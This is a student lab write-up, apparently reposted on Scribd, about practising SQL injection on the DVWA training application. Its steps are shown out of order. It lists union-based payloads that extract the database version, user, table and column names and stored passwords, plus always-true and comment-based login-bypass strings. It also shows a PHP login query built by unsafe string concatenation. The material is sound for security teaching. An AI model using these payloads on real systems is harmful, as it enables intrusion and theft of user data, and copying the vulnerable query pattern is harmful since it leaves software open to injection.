0% found this document useful (0 votes)
1 views7 pages

SQL Injection

The document outlines a series of steps for performing SQL injection attacks on a DVWA (Damn Vulnerable Web Application) setup. It explains how to manipulate input fields to extract database information, including user details and database metadata, using various SQL commands. The objective is to demonstrate the vulnerabilities in web applications that do not properly sanitize user inputs, allowing attackers to gain unauthorized access to sensitive data.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
1 views7 pages

SQL Injection

The document outlines a series of steps for performing SQL injection attacks on a DVWA (Damn Vulnerable Web Application) setup. It explains how to manipulate input fields to extract database information, including user details and database metadata, using various SQL commands. The objective is to demonstrate the vulnerabilities in web applications that do not properly sanitize user inputs, allowing attackers to gain unauthorized access to sensitive data.
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as DOCX, PDF, TXT or read online on Scribd
You are on page 1/ 7

Step 9: Display all the columns fields in the information_schema user-table:

%' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns


where table_name = 'users' #

Step 10: Display Column field contents

%' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #


Step 6: Display Database Name: we will inject the SQL code below in the User ID field.
%' or 0=0 union select null, database() #
The database name is listed next to the surname field in the last line

Step 7: Display all tables in information_schema : use the text below.


%' and 1=0 union select null, table_name from information_schema.tables #

Step 8: Display all the user tables in information_schema : Enter the SQL code (%' and 1=0 union select null,
table_name from information_schema.tables where table_name like 'user%'# )
Let’s change the ID parameter of the URL to a number like 1,2,3,4 etc. That will also return the First_name and
Surname of all users as follows:
ID: 2 | First name: Gordon | Surname: Brown
ID: 3 |First name: Hack |Surname: Me
ID: 4 |First name: Pablo |Surname: Picasso
If you were executing this command directly on the DVWA database, the query for User ID 3 would look like
this: SELECT first_name, last_name FROM users WHERE user_id = '3';

Step 3: Always True Scenario : An advanced method to extract all the First_names and Surnames from the

database would be to use the input: %' or '1'='1‘

The percentage % sign does not equal anything and will be false. The '1'='1' query is registered as True since 1
will always equal 1. If you were executing that on a database, the query would look like this:
SELECT first_name, last_name FROM users WHERE user_id = '%' or '1'='1';
Step 4: Display Database Version : To know the database version the DVWA application is running on, enter
the text below in the User ID field.
%' or 0=0 union select null, version() #
The database version will be listed under surname in the last line as shown in the image below.

Step 5: Display Database User : To display the Database user who executed the PHP code powering the
database, enter the text below in the USER ID field.
%' or 0=0 union select null, user() #
Step 1: Setup DVWA for SQL Injection :- 127.0.0.1/dvwa/login.php Log in using the username “admin” and
password as “password”. These are the default DVWA login credentials. After a successful login, set the DVWA
security to LOW then click on SQL Injection on the left-side menu.

Step 2: Basic Injection : On the User ID field, enter “1” and click Submit.That is supposed to print the ID,
First_name, and Surname on the screen as you can see below. The SQL syntax being exploited here is:

$getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";


when you check the URL, you will see there is an injectable parameter which is the ID. Currently, my URL looks
like this:http://172.16.15.128/dvwa/vulnerabilities/sqli/?id=1&Submit=Submit#
MODULE-2 EXPERIMENT-1
Objective: SQL Injection: Use DVWA to practice SQL injection attacks. Demonstrate how an
attacker can manipulate input fields to extract, modify, or delete database information.
Q. What is SQL injection (SQLi)?
It’s a technique where SQL code/statements are inserted in the execution field with an aim of
either altering the database contents, dumping useful database contents to the hacker, cause
repudiation issues, spoof identity, and much more.

Process: Let’s take a simple scenario where we have a web application with a login form
with username and password fields. If the developer used PHP for development, the code
would look like this:
<?php
$query = "SELECT * FROM users WHERE username = '" . $_POST['username'] . "'";
$query .= " AND password = '" . $_POST['password'] . "'";
?>
If a user UTKARSH with the password ‘12345’ wanted to log in, after clicking the Submit or the
Log in button, the query that would be sent to the database would look like this:
SELECT * FROM users WHERE username=‘UTKARSH' AND password='12345‘
If an attacker knew the username and wanted to bypass the login window,
they would put something like UTKARSH;-- in the username field. The resulting SQL query
would look like this:
SELECT * FROM users WHERE username=‘UTKARSH'; -- ' AND password='1111'
What the attacker has done, is adding the -- (double-dash) which comments the rest of the SQL
statement.
The above query will return the information entered in the password field making it easier for
the attacker to bypass the login screen.

You might also like